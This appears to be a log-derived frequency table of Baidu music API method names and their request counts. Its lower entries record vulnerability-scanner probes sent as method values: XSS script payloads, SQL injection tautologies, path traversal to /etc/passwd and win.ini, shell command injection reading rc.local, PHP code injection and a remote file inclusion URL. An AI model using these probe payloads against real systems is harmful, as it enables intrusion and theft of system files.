baidu.ting.song.getInfos	60926442
baidu.ting.search.lrcpic	29027626
baidu.ting.song.baseInfo	27547555
baidu.ting.search.catalogSug	21407293
baidu.ting.user.listenAge	18629482
baidu.ting.search.common	18150109
baidu.ting.song.play	17931643
baidu.ting.song.down	9645268
baidu.ting.user.getUserBaseInfo	8500349
baidu.ting.song.lry	8015642
ting.baidu.diy.getPlaylists	5760062
baidu.ting.artist.getSongList	5723854
baidu.ting.favorite.isCollect	5377957
baidu.ting.artist.getList	5165608
baidu.ting.search.lrcys	4949071
baidu.ting.song.getInfo	4861886
baidu.ting.billboard.billList	4779124
baidu.ting.search.getPhotoInfos	4402694
baidu.ting.user.config	3633468
baidu.ting.game.gamedetail	3629241
baidu.ting.plaza.getRecommendAlbum	3307738
baidu.ting.user.checkSuggestVersion	3228530
baidu.ting.user.checkComVersion	3011944
baidu.ting.artist.getInfo	3010590
baidu.ting.plaza.active	2835527
baidu.ting.active.start	2796828
baidu.ting.radio.playAction	2512619
baidu.ting.diy.gedanInfo	2511625
	2379145
baidu.ting.plaza.getFocusPic	2046242
baidu.ting.user.registToUC	2039029
baidu.ting.user.getMessage	1911694
baidu.ting.diy.gedanHot	1785428
baidu.ting.search.suggestion	1518882
baidu.ting.artist.getinfo	1420870
baidu.ting.diy.category	1399327
ting.baidu.plaza.recdaily	1377384
baidu.ting.album.getAlbumInfo	1342160
baidu.ting.radio.getChannelSong	1336679
baidu.ting.diy.getSongFromOfficalList	1205005
baidu.ting.diy.addListenCount	1124507
baidu.ting.favorite.getCollectSong	1093394
baidu.ting.plaza.recdaily	1076913
baidu.ting.plaza.getPartDesc	967750
baidu.ting.user.down	911717
baidu.ting.artist.getAlbumList	901418
baidu.ting.feedback.song	824273
baidu.ting.user.RegistToImsg	715346
baidu.ting.diy.getNowOfficalList	710035
baidu.ting.tag.songlist	676493
baidu.ting.song.audio	675592
baidu.ting.diy.gedan	656062
baidu.ting.tag.getHotTag	652951
baidu.ting.radio.getCategoryList	454674
baidu.ting.billboard.billCategory	379837
baidu.ting.search.lrcyss	357905
baidu.ting.search.getPhotoInfo	353657
baidu.ting.diy.getPlaylists	346858
baidu.ting.artist.get72HotArtist	258041
baidu.ting.game.gamelist	242779
baidu.ting.plaza.recommend	218060
baidu.ting.song.buffer	203538
baidu.ting.favorite.getFavoriteSong	196713
baidu.ting.favorite.addSongFavorites	152100
baidu.ting.video.getList	147732
baidu.ting.song.getMulInfos	144817
baidu.ting.mv.getIndexMV	117490
baidu.ting.favorite.addSongFavorite	108777
baidu.ting.tag.getAllTag	106593
baidu.ting.diy.search	100638
baidu.ting.diy.getSimilarGedan	100359
baidu.ting.diy.getOfficialDiyList	83280
baidu.ting.video.play	81560
baidu.ting.user.checkVersion	55312
baidu.ting.favorite.delCollectSong	54827
baidu.ting.artist.getSpecialSongList	48515
ting.baidu.diy.getPlaylist	45270
baidu.ting.plaza.getNewSongs	43734
baidu.ting.mv.playMV	37575
baidu.ting.radio.getArtistChannelSong	29295
baidu.ting.radio.getFavoriteSong	24688
baidu.ting.diy.getPlaylist	22832
baidu.ting.diy.saveList	19464
baidu.ting.plaza.getArtistPlaza	18649
baidu.ting.radio.serv	17813
baidu.ting.feedback.crash	14420
baidu.ting.artist.getHighSongTitle	13792
baidu.ting.song.cloud	11748
baidu.ting.album.getList	11250
baidu.ting.video.category	10289
ting.baidu.film.getFilmInfo	9265
baidu.ting.mv.searchMV	8859
baidu.ting.favorite.delSongFavorite	8407
baidu.ting.song.getMulInfo	7143
baidu.ting.user.nplogin	7137
baidu.ting.artist.getQianQianArtist	6671
ting.baidu.song.lry	6615
baidu.ting.diy.delList	6611
baidu.ting.outerPassport.profile	6602
baidu.ting.weixin.response	6535
baidu.ting.diy.addListSong	5561
baidu.ting.diy.delListSong	5504
baidu.ting.song.playAAC	5279
baidu.ting.colorRing.listen	4666
baidu.ting.user.logout	4440
baidu.ting.billboard.catalog	4235
baidu.ting.user.regPassport	3978
baidu.ting.colorRing.getCode	3503
baidu.ting.artist.getHighSongList	3385
baidu.ting.colorRing.authset	3237
baidu.ting.user.getMobileVcode	2754
baidu.ting.favorite.delSongFavorites	2049
ting.baidu.artistapp.renum	2009
baidu.ting.mv.getMultiSongMVInfo	1747
baidu.ting.diy.getRecommendSpeical	1729
baidu.ting.feedback.info	1633
baidu.ting.favorite.getFavoriteAlbum	1592
baidu.ting.artist.getSongRank	1322
baidu.ting.artist.getSong	1307
baidu.ting.diy.addList	855
baidu.ting.favorite.getListenHistory	797
baidu.ting.mv.getMVCategory	773
ting.baidu.artistapp.brief	773
baidu.ting.diy.upList	745
baidu.ting.video.recMv	577
ting.baidu.search.lrcpic	547
baidu.ting.favorite.getOffenListenList	479
baidu.ting.colorRing.toneset	447
baidu.ting.colorRing.subscribe	432
baidu.ting.song.getSuoSongInfo	374
baidu.ting.artist.getInfoList	326
baidu.ting.user.activate	326
baidu.ting.artist.getInfoByName	316
baidu.ting.favorite.addAlbumFavorite	310
ting.baidu.plaza.getFocusPic	288
baidu.ting.song.getHash	163
baidu.ting.user.login	161
baidu.ting.favorite.getInfoFromView	148
baidu.ting.artistapp.photo	135
ting.baidu.artistapp.newList	123
ting.baidu.artistapp.news	81
baidu.ting.favorite.delAlbumFavorite	70
baidu.ting.user.addPassportInfo	57
baidu.ting.plaza.getMisNewSong	52
ting.baidu.artistapp.briefs	32
baidu.ting.album.getAlbumstyle	23
baidu.ting.game.catalog	22
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	22
baidu.ting.song.getPic	17
ting.baidu.artistapp.send	9
\' (	6
(	6
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.song.lryabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.game.gameplay	3
1\';cat /etc/rc.d/rc.local;\'	2
\'];${@print(md5(812812))};//	2
http://cirt.lnet/rfiinc.txt_	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	2
c:/windows/win.ini_	2
../../../../../../../../../../etc/passwd_	2
../../../../../../../../../../etc/rc.d/rc.local_	2
../../../../../../../../../../etc/rc.d/rc.local	2
../../../../../../../../../../etc/passwd_.jpeg	2
/usr/bin/id;	2
set	2
../../../../../../../../../../etc/passwd	2
http://cirt.lnet/rfiinc.txt	2
${@print(md5(812812))}	2
../../../../../../../../../../etc/rc.d/rc.local_.htm	2
file:///etc/passwd	2
file:///etc/rc.d/rc.local_	2
data://text/plain;base64,dGVzdA==_	2
baidu.ting.song.play\';alert(1);\'	2
c:/windows/win.ini	2
http://10.42.7.217/?1386602489.55	2
http://10.42.7.217/?1386602429.81	2
data://text/plain;base64,dGVzdA==	2
baidu.ting.song.lry\';alert(1);\'	2
1\\\";cat /etc/rc.d/rc.local;\\\"	2
file:///etc/rc.d/rc.local	2
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	2
string:{var_dump(md5(812812))}	2
1;cat /etc/rc.d/rc.local;	2
%{	2
file:///etc/passwd_	2
${	2
baidu.on	1
baidu.ting.song.lry\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	1
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	1
baidu.ting.song.lry\'>\"></title></textarea></script><img src=a onerror=alert(1)>	1
baidu.ting.artist.getSongVote	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpeg	1
baidu.ting.song.lry<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpg	1
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	1
baidu.ting.song.lry\'>\\\';</script>>\\\"><script>alert(1)</script>\'	1
baidu.ting.song.lry</textarea></title><script>alert(1)</script>	1
baidu.ting.song.play--></script><script>alert(1)</script>	1
baidu.ting.song.lry--></script><script>alert(1)</script>	1
baidu.ting.song.play>\'>\"><script>alert(1)</script>	1
baidu.ting.song.getIofos	1
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	1
baidu.ting.song.lry>\'>\"><script>alert(1)</script>	1
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	1
baidu.ting.song.lry\"><img src=1 onerror=alert(1)>	1
baidu.ting.song.lry%\' and 8281=8281 and \'%\'=\'	1
baidu.ting.song.play</script><script>alert(1);//	1
baidu.ting.song.play<script>confirm(1)</script>	1
baidu.ting.song.lry</script><script>alert(1);//	1
baidu.ting.song.lry<script>confirm(1)</script>	1
baidu.ting.song.play\') and 8288=8288 and (\'	1
baidu.ting.song.lry\') and 8288=8288 and (\'	1
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	1
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	1
baidu.ting.song.play\' and \'8281\'=\'8281	1
baidu.ting.song.lry(\')\'))(\")\'\"\"\"\")	1
baidu.ting.song.lry\' and \'8281\'=\'8281	1
data://text/plain;base64,dGVzdA==_.jpeg	1
baidu.ting.song.playjavascript:alert(1)	1
data://text/plain;base64,dGVzdA==_.htm	1
baidu.ting.song.lryjavascript:alert(1)	1
baidu.ting.song.play\'\";alert(1);//	1
ting.baidu.song.getMulInfos	1
baidu.ting.push.send	1
baidu.ting.song.lry\'\";alert(1);//	1
baidu.ting.song.play\";alert(1);\"	1
http://cirt.lnet/rfiinc.txt_.jpeg	1
baidu.ting.song.lry\";alert(1);\"	1
baidu.ting.song.play</textarea></title><script>alert(1)</script>	1
file:///etc/passwd_.htm	1
http://cirt.lnet/rfiinc.txt_.jpg	1
baidu.ting.song.play;alert(1);//	1
baidu.ting.song.lry;alert(1);//	1
file:///etc/rc.d/rc.local_.php	1
file:///etc/rc.d/rc.local_.jpg	1
baidu.ting.search.catalogS ug	1
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	1
ting.baidu.song.baseinfo	1
file:///etc/passwd_.jpeg	1
c:/windows/win.ini_.jpeg	1
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	1
c:/windows/win.ini_.htm	1
{{method}}	1
